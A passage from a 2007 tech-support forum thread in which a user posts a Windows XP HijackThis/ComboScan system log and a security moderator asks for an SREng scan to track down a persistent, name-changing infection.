Explorer\Search,Default_Search_URL = http://www.google.com/ie R1 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie O2 - BHO: Yahoo! Companion BHO - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O2 - BHO: (no name) - {243B17DE-77C7-46BF-B94B-0B5F309A0E64} - C:\Program Files\Microsoft Money\System\mnyside.dll O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files\Google\GoogleToolbar3.dll O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll O3 - Toolbar: Yahoo! Companion - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\ycomp5_3_16_0.dll O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\system32\msdxm.ocx O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\GoogleToolbar3.dll O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [SSC_UserPrompt] C:\Program Files\Common Files\Symantec Shared\Security Center\UsrPrmpt.exe O4 - HKLM\..\Run: [Ulead AutoDetector] C:\Program Files\Ulead Systems\Ulead Photo Explorer 8.0 SE Basic\Monitor.exe O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe O4 - HKLM\..\Run: [HP Component Manager] "C:\Program Files\HP\hpcoretech\hpcmpmgr.exe" O4 - HKLM\..\Run: [HP Software Update] "C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe" O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [Picasa Media Detector] C:\Program Files\Picasa2\PicasaMediaDetector.exe O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe" O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP O4 - HKLM\..\Run: [OFFICEKB] C:\Program Files\Micro Innovations\Keyboard\kbdap32a.EXE O4 - HKLM\..\Run: [FLMOFFICE4DMOUSE] C:\Program Files\Micro Innovations\Mouse\mouse32a.exe O4 - HKLM\..\Run: [PC Pitstop Optimize Scheduler] C:\Program Files\PCPitstop\Optimize\PCPOptimize.exe -boot O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe" O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - HKCU\..\Run: [Microsoft Works Update Detection] c:\Program Files\Microsoft Works\WkDetect.exe O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\1.2.1128.5462\GoogleToolbarNotifier.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: BigFix.lnk = C:\Program Files\BigFix\BigFix.exe O4 - Global Startup: Ulead Photo Express 4.0 SE Calendar Checker .lnk = C:\Program Files\Ulead Systems\Ulead Photo Express 4.0 SE\CalCheck.exe O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar1.dll/cmsearch.html O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar1.dll/cmwordtrans.html O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar1.dll/cmbacklinks.html O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar1.dll/cmcache.html O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar1.dll/cmsimilar.html O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar1.dll/cmtrans.html O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll O9 - Extra button: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\Icq.exe O9 - Extra 'Tools' menuitem: ICQ - {6224f700-cba3-4071-b251-47cb894244cd} - C:\Program Files\ICQ\Icq.exe O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (file missing) O9 - Extra 'Tools' menuitem: (no name) - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - (file missing) O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll O9 - Extra 'Tools' menuitem: (no name) - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyside.dll O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O16 - DPF: Video Poker () - http://download.games.yahoo.com/game...s/y/vpt0_x.cab O16 - DPF: Yahoo! Backgammon () - http://download.games.yahoo.com/game...ts/y/at1_x.cab O16 - DPF: Yahoo! Bingo () - http://download.games.yahoo.com/game...ts/y/xt0_x.cab O16 - DPF: Yahoo! Blackjack () - http://download.games.yahoo.com/game...ts/y/jt0_x.cab O16 - DPF: Yahoo! Checkers () - http://download.games.yahoo.com/game...ts/y/kt4_x.cab O16 - DPF: Yahoo! Chess () - http://download.games.yahoo.com/game...ts/y/ct2_x.cab O16 - DPF: Yahoo! Cribbage () - http://download.games.yahoo.com/game...ts/y/it1_x.cab O16 - DPF: Yahoo! Dice () - http://download.games.yahoo.com/game...s/y/dct4_x.cab O16 - DPF: Yahoo! Go Fish () - http://download.games.yahoo.com/game...ts/y/zt3_x.cab O16 - DPF: Yahoo! Klondike Solitaire () - http://presence.games.yahoo.com/yog/y/ks12_x.cab O16 - DPF: Yahoo! Poker () - http://download.games.yahoo.com/game...ts/y/pt3_x.cab O16 - DPF: Yahoo! Pyramids () - http://download.games.yahoo.com/game...s/y/pyt1_x.cab O16 - DPF: {0000000A-0000-0010-8000-00AA00389B71} () - http://download.microsoft.com/downlo...367/wmavax.CAB O16 - DPF: {01113300-3E00-11D2-8470-0060089874ED} (Support.com Configuration Class) - http://support.cox.com/sdccommon/download/tgctlcm.cab O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/viewers/ipixx.cab O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://active.macromedia.com/director/cabs/sw.cab O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} () - http://download.microsoft.com/downlo...22/wmv9VCM.CAB O16 - DPF: {4620BC29-8B8E-4F4E-9D92-1DB6633D6793} (SurferNETWORK Plugin) - http://rd1.surfernetwork.com/surferplugin.ocx O16 - DPF: {56336BCB-3D8A-11D6-A00B-0050DA18DE71} () - http://software-dl.real.com/14939218...p/RdxIE601.cab O16 - DPF: {62789780-B744-11D0-986B-00609731A21D} (Autodesk MapGuide ActiveX Control) - http://maricopa.gov/assessor/gis/plugin/mgaxctrl.cab O16 - DPF: {7FE26BE2-B923-4B41-9834-E84DA1CC1F96} (Maid Control) - http://vsp.closetmaid.com/vsp/cmaidc...downloader.cab O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/actives...ree/asinst.cab O16 - DPF: {CC05BC12-2AA2-4AC7-AC81-0E40F83B1ADF} (Live365Player Class) - http://www.live365.com/players/play365.cab O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload.macromedia.com/get...nt/swflash.cab O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} (TikGames Online Control) - http://download.games.yahoo.com/game.../gpcontrol.cab O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} (PopCapLoader Object) - http://download.games.yahoo.com/game...ploader_v6.cab O18 - Protocol: belarc - {6318E0AB-2E93-11D1-B8ED-00608CC9A71F} - C:\Program Files\Belarc\Advisor\System\BAVoilaX.dll O18 - Protocol: cetihpz - {CF184AD3-CDCB-4168-A3F7-8E447D129300} - C:\Program Files\HP\hpcoretech\comp\hpuiprot.dll O20 - Winlogon Notify: igfxcui - C:\WINDOWS\System32\igfxsrvc.dll O23 - Service: Alerter - C:\WINDOWS\System32\svchost.exe -k LocalService O23 - Service: Application Layer Gateway Service (ALG) - C:\WINDOWS\system32\alg.exe O23 - Service: Application Management (AppMgmt) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Windows Audio (AudioSrv) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: AVG Anti-Spyware Guard - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - C:\Program Files\Grisoft\AVG7\avgamsvr.exe O23 - Service: AVG7 Update Service (Avg7UpdSvc) - C:\Program Files\Grisoft\AVG7\avgupsvc.exe O23 - Service: AVG E-mail Scanner (AVGEMS) - C:\Program Files\Grisoft\AVG7\avgemc.exe O23 - Service: Background Intelligent Transfer Service (BITS) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Computer Browser (Browser) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Indexing Service (CiSvc) - C:\WINDOWS\system32\cisvc.exe O23 - Service: ClipBook (ClipSrv) - C:\WINDOWS\system32\clipsrv.exe O23 - Service: COM+ System Application (COMSysApp) - C:\WINDOWS\System32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} O23 - Service: Cryptographic Services (CryptSvc) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: DHCP Client (Dhcp) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - C:\WINDOWS\System32\dmadmin.exe /com O23 - Service: Logical Disk Manager (dmserver) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: DNS Client (Dnscache) - C:\WINDOWS\System32\svchost.exe -k NetworkService O23 - Service: Error Reporting Service (ERSvc) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Event Log (Eventlog) - C:\WINDOWS\system32\services.exe O23 - Service: COM+ Event System (EventSystem) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Fast User Switching Compatibility (FastUserSwitchingCompatibility) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Google Updater Service (gusvc) - "C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe" O23 - Service: Help and Support (helpsvc) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Human Interface Device Access (HidServ) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: InstallDriver Table Manager (IDriverT) - "C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" O23 - Service: IMAPI CD-Burning COM Service (ImapiService) - C:\WINDOWS\system32\imapi.exe O23 - Service: iPodService - C:\Program Files\iPod\bin\iPodService.exe O23 - Service: Server (lanmanserver) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Workstation (lanmanworkstation) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: TCP/IP NetBIOS Helper (LmHosts) - C:\WINDOWS\System32\svchost.exe -k LocalService O23 - Service: Messenger - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: NetMeeting Remote Desktop Sharing (mnmsrvc) - C:\WINDOWS\system32\mnmsrvc.exe O23 - Service: Distributed Transaction Coordinator (MSDTC) - C:\WINDOWS\system32\msdtc.exe O23 - Service: Windows Installer (MSIServer) - C:\WINDOWS\System32\msiexec.exe /V O23 - Service: Network DDE (NetDDE) - C:\WINDOWS\system32\netdde.exe O23 - Service: Network DDE DSDM (NetDDEdsdm) - C:\WINDOWS\system32\netdde.exe O23 - Service: Net Logon (Netlogon) - C:\WINDOWS\system32\lsass.exe O23 - Service: Network Connections (Netman) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Network Location Awareness (NLA) (Nla) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: NT LM Security Support Provider (NtLmSsp) - C:\WINDOWS\system32\lsass.exe O23 - Service: Removable Storage (NtmsSvc) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Office Source Engine (ose) - "C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE" O23 - Service: Plug and Play (PlugPlay) - C:\WINDOWS\system32\services.exe O23 - Service: IPSEC Services (PolicyAgent) - C:\WINDOWS\system32\lsass.exe O23 - Service: Protected Storage (ProtectedStorage) - C:\WINDOWS\system32\lsass.exe O23 - Service: Remote Access Auto Connection Manager (RasAuto) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Remote Access Connection Manager (RasMan) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Remote Desktop Help Session Manager (RDSessMgr) - C:\WINDOWS\system32\sessmgr.exe O23 - Service: Routing and Remote Access (RemoteAccess) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Remote Procedure Call (RPC) Locator (RpcLocator) - C:\WINDOWS\system32\locator.exe O23 - Service: Remote Procedure Call (RPC) (RpcSs) - C:\WINDOWS\system32\svchost -k rpcss O23 - Service: QoS RSVP (RSVP) - C:\WINDOWS\system32\rsvp.exe O23 - Service: Security Accounts Manager (SamSs) - C:\WINDOWS\system32\lsass.exe O23 - Service: Smart Card Helper (SCardDrv) - C:\WINDOWS\system32\scardsvr.exe O23 - Service: Smart Card (SCardSvr) - C:\WINDOWS\system32\scardsvr.exe O23 - Service: Task Scheduler (Schedule) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Secondary Logon (seclogon) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: System Event Notification (SENS) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Windows Firewall/Internet Connection Sharing (ICS) (SharedAccess) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Shell Hardware Detection (ShellHWDetection) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Sygate Personal Firewall (SmcService) - C:\Program Files\Sygate\SPF\Smc.exe O23 - Service: Print Spooler (Spooler) - C:\WINDOWS\system32\spoolsv.exe O23 - Service: System Restore Service (srservice) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: SSDP Discovery Service (SSDPSRV) - C:\WINDOWS\System32\svchost.exe -k LocalService O23 - Service: Windows Image Acquisition (WIA) (stisvc) - C:\WINDOWS\System32\svchost.exe -k imgsvc O23 - Service: MS Software Shadow Copy Provider (SwPrv) - C:\WINDOWS\System32\dllhost.exe /Processid:{195E6122-CAE8-4FC9-BD96-F81BBD1135E2} O23 - Service: SymWMI Service (SymWSC) - "C:\Program Files\Common Files\Symantec Shared\Security Center\SymWSC.exe" O23 - Service: Performance Logs and Alerts (SysmonLog) - C:\WINDOWS\system32\smlogsvc.exe O23 - Service: Telephony (TapiSrv) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Terminal Services (TermService) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Themes - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Distributed Link Tracking Client (TrkWks) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Windows User Mode Driver Framework (UMWdf) - C:\WINDOWS\system32\wdfmgr.exe O23 - Service: Upload Manager (uploadmgr) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: Universal Plug and Play Device Host (upnphost) - C:\WINDOWS\System32\svchost.exe -k LocalService O23 - Service: Uninterruptible Power Supply (UPS) - C:\WINDOWS\system32\ups.exe O23 - Service: Volume Shadow Copy (VSS) - C:\WINDOWS\system32\vssvc.exe O23 - Service: Windows Time (W32Time) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: WAN Miniport (ATW) Service (WANMiniportService) - "C:\WINDOWS\wanmpsvc.exe" O23 - Service: WebClient - C:\WINDOWS\System32\svchost.exe -k LocalService O23 - Service: Windows Management Instrumentation (winmgmt) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - C:\WINDOWS\System32\svchost.exe -k netsvcs O23 - Service: WMI Performance Adapter (WmiApSrv) - C:\WINDOWS\system32\wbem\wmiapsrv.exe O23 - Service: Automatic Updates (wuauserv) - C:\WINDOWS\system32\svchost.exe -k netsvcs O23 - Service: Wireless Zero Configuration (WZCSVC) - C:\WINDOWS\System32\svchost.exe -k netsvcs -- Files created between 2007-02-19 and 2007-03-19 ----------------------------- 2007-03-19 21:14:12 0 d--h----- C:\WINDOWS\PIF 2007-03-19 20:55:17 0 --a------ C:\WINDOWS\System32\setup_63032.exe<SETUP_~1.EXE> 2007-03-18 22:27:49 80 --a------ C:\WINDOWS\gmer_uninstall.cmd<GMER_U~1.CMD> 2007-03-18 1233 552 --a------ C:\Combo.bat 2007-03-18 09:51:51 77 --a------ C:\delete.reg 2007-03-13 20:51:18 136 --a------ C:\WINDOWS\System32\dgjun.bat 2007-03-12 18:20:25 491768 --a------ C:\ie6setup.exe 2007-03-11 22:17:35 0 d-------- C:\WINDOWS\System32\ActiveScan<ACTIVE~1> 2007-03-11 09:25:11 0 d-------- C:\Program Files\Java 2007-03-11 09:25:11 0 d-------- C:\Program Files\Common Files\Java 2007-03-11 09:24:21 0 d-------- C:\Documents and Settings\Duane\Application Data\Sun 2007-03-10 11:31:19 0 d-------- C:\Rustbfix 2007-03-08 19:56:44 0 d-------- C:\WINDOWS\ERDNT 2007-03-08 19:33:08 49152 --a------ C:\Documents and Settings\Duane\vfind.exe 2007-03-08 19:33:08 79360 --a------ C:\Documents and Settings\Duane\swxcacls.exe 2007-03-08 19:33:08 123904 --a------ C:\Documents and Settings\Duane\swsc.exe 2007-03-08 19:33:08 140800 --a------ C:\Documents and Settings\Duane\swreg.exe 2007-03-08 19:33:08 8192 --a------ C:\Documents and Settings\Duane\RestartIt.exe<RESTAR~1.EXE> 2007-03-08 19:33:08 6914 --a------ C:\Documents and Settings\Duane\Qoo.bat 2007-03-08 19:33:08 971 --a------ C:\Documents and Settings\Duane\Purity.bat 2007-03-08 19:33:08 39184 --a------ C:\Documents and Settings\Duane\Ntrights.exe 2007-03-08 19:33:08 5074 --a------ C:\Documents and Settings\Duane\NTPBack.exe 2007-03-08 19:33:08 42887 --a------ C:\Documents and Settings\Duane\ntp.exe 2007-03-08 19:33:08 26112 --a------ C:\Documents and Settings\Duane\nircmd.exe 2007-03-08 19:33:08 38400 --a------ C:\Documents and Settings\Duane\moveex.exe 2007-03-08 19:33:08 2304 --a------ C:\Documents and Settings\Duane\Look2Me.bat 2007-03-08 19:33:08 117379 --a------ C:\Documents and Settings\Duane\LIST-C.bat 2007-03-08 19:33:08 181776 --a------ C:\Documents and Settings\Duane\handle.exe 2007-03-08 19:33:08 73728 --a------ C:\Documents and Settings\Duane\FDSV.EXE 2007-03-08 19:33:08 51200 --a------ C:\Documents and Settings\Duane\dumphive.exe 2007-03-08 19:33:08 319415 --a------ C:\Documents and Settings\Duane\Creg.reg 2007-03-08 19:33:08 28672 --a------ C:\Documents and Settings\Duane\catchme.exe 2007-02-24 21:33:14 53248 --a------ C:\WINDOWS\System32\Process.exe 2007-02-24 21:33:08 0 d-------- C:\SmitfraudFix<SMITFR~1> 2007-02-24 10:28:21 19392 --a------ C:\WINDOWS\System32\drivers\avgmfx86.sys 2007-02-24 10:28:21 3968 --a------ C:\WINDOWS\System32\drivers\avgclean.sys 2007-02-21 21:42:30 129 --a------ C:\fix.bat 2007-02-20 23:22:43 0 d-------- C:\Program Files\backups -- Find3M Report --------------------------------------------------------------- 2007-03-19 21:58:43 0 d-------- C:\Program Files\Hijack This<HIJACK~1> 2007-03-19 21:57:46 0 d-------- C:\Program Files\Mozilla Firefox<MOZILL~1> 2007-03-18 10:52:10 0 d-------- C:\Program Files\Picasa2 2007-03-18 10:50:23 0 d-------- C:\Program Files\Messenger<MESSEN~1> 2007-03-18 10:45:17 0 d-------- C:\Program Files\iTunes 2007-03-18 10:44:01 0 d-------- C:\Program Files\Google 2007-03-18 10:41:36 0 d-------- C:\Program Files\BigFix 2007-03-08 19:47:09 0 d-------- C:\Program Files\Common Files\Symantec Shared<SYMANT~1> 2007-02-25 10:48:59 0 d---s---- C:\Documents and Settings\Duane\Application Data\Microsoft<MICROS~1> 2007-02-24 22:08:44 3762 --a------ C:\WINDOWS\System32\tmp.reg 2007-02-24 10:40:37 0 d-------- C:\Documents and Settings\Duane\Application Data\AVG7 2007-02-24 10:28:12 0 d-------- C:\Program Files\Grisoft 2007-02-20 21:14:12 0 d-------- C:\Program Files\Shockwave.com<SHOCKW~1.COM> 2007-02-13 21:29:11 0 d-------- C:\Program Files\Common Files\Sandlot Shared<SANDLO~1> 2007-02-10 20:00:13 14201 --a------ C:\Program Files\hijackthis.log<HIJACK~1.LOG> 2007-01-28 22:13:42 0 d-------- C:\Program Files\LG Software Innovations<LGSOFT~1> 2007-01-28 22:05:20 0 d-------- C:\Program Files\CloneDVD 2007-01-28 21:28:17 14 --a------ C:\WINDOWS\System32\systeminfo3.dll<SYSTEM~1.DLL> 2007-01-28 21:26:56 0 d-------- C:\Documents and Settings\Duane\Application Data\Vso 2007-01-28 21:26:55 34 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.log 2007-01-28 21:26:41 47360 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.sys 2007-01-28 21:26:41 1144 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.inf 2007-01-28 21:26:41 7176 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.cat 2007-01-28 21:26:41 81920 --a------ C:\Documents and Settings\Duane\Application Data\ezpinst.exe 2007-01-21 15:19:32 0 d-------- C:\Documents and Settings\Duane\Application Data\Lavasoft 2007-01-21 15:19:15 0 d-------- C:\Program Files\Lavasoft 2007-01-21 15:08:15 14612 --a------ C:\Program Files\CWSHREDDER.EXE-2D092FD4.pf<CWSHRE~1.PF> 2007-01-21 15:03:52 532480 --a------ C:\Program Files\cwshredder.exe<CWSHRE~1.EXE> 2007-01-12 18:19:57 0 --a------ C:\WINDOWS\System32\vb2en16.dll 2007-01-11 16:35:33 12800 --a------ C:\WINDOWS\System32\svchost.exe 2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\ps.dat 2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\cookie.dat 2007-01-07 13:16:52 25600 --a------ C:\WINDOWS\System32\helper.dll 2007-01-04 22:35:41 10660 --a------ C:\WINDOWS\mozver.dat 2007-01-03 20:49:11 5037072 --a------ C:\Program Files\spybotsd14.exe<SPYBOT~1.EXE> 2007-01-01 12:02:40 507 --a------ C:\WINDOWS\EReg077.dat 2006-12-25 16:33:11 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi<PLAINO~1.XPI> -- Registry Dump --------------------------------------------------------------- [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run] "MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background" "Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe" "swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run] "TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot" "SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe" "Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe" "HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe" "HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\"" "HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\"" "QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime" "Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe" "iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" "AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP" "OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE" "FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe" "PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot" "SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui" "SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\"" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents] [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL] "Installed"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI] "Installed"="1" "NoChange"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS] "Installed"="1" [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks] "{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5" [HKEY_USERS\.default\software\microsoft\windows\currentversion\run] "AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgw.exe /RUNONCE" [HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\run] "AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgw.exe /RUNONCE" [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders] "SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll" [HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost] LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0 NetworkService REG_MULTI_SZ DnsCache\0\0 rpcss REG_MULTI_SZ RpcSs\0\0 imgsvc REG_MULTI_SZ StiSvc\0\0 termsvcs REG_MULTI_SZ TermService\0\0 -- End of ComboScan: finished at 2007-03-19 at 22:02:00 ------------------------

03-19-2007, 11:20 PM	#67 (permalink)
Ried Assistant Manager, TSF Academy; Moderator/Analyst Security Team Join Date: Jan 2005 Location: Ohio Posts: 26,808 OS: WinXP and Vista	Re: MS Windows XP will not load when connected to internet Hi, It's still there--it keeps changing names on us. We need to find the spawning entry. Let's see if this tool will provide us more info: Please download SREng. You may receive a message "The bandwidth limit for this site has been exceeded", please keep trying--eventually you'll get through. 1. Extract it to Desktop & double click SREng.exe to run it 2. Select 'Smart Scan' & tick "Verify Digital Signatures**" 3. Click on the [Scan] button 4. When finished, click on the [Save Reports] button & save the log to Desktop 5. Attach the log in your next reply. Dont post it. You may have to rename SREngLOG.log to SREngLOG.txt to upload it. -------------------------------------------------------- It's after 1am my time, so I'll have to pick this up again tomorrow afternoon. Go ahead and shut your machine down when you're through. __________________ Member of ASAP since 2005 Member of UNITE since 2006 "It is one life whether we spend it laughing or weeping." "Take the time to laugh--it is the music of the soul."

03-20-2007, 07:15 AM	#68 (permalink)
cul8rman Registered User Join Date: Aug 2006 Location: Arizona Posts: 134 OS: XP	Re: MS Windows XP will not load when connected to internet Here is the latest log file, attached. I have left the system up. IE will not load so hopefully we do not need a Pandascan until I can restart the system, It should work then. Thanks a lot.

03-20-2007, 10:46 PM	#71 (permalink)
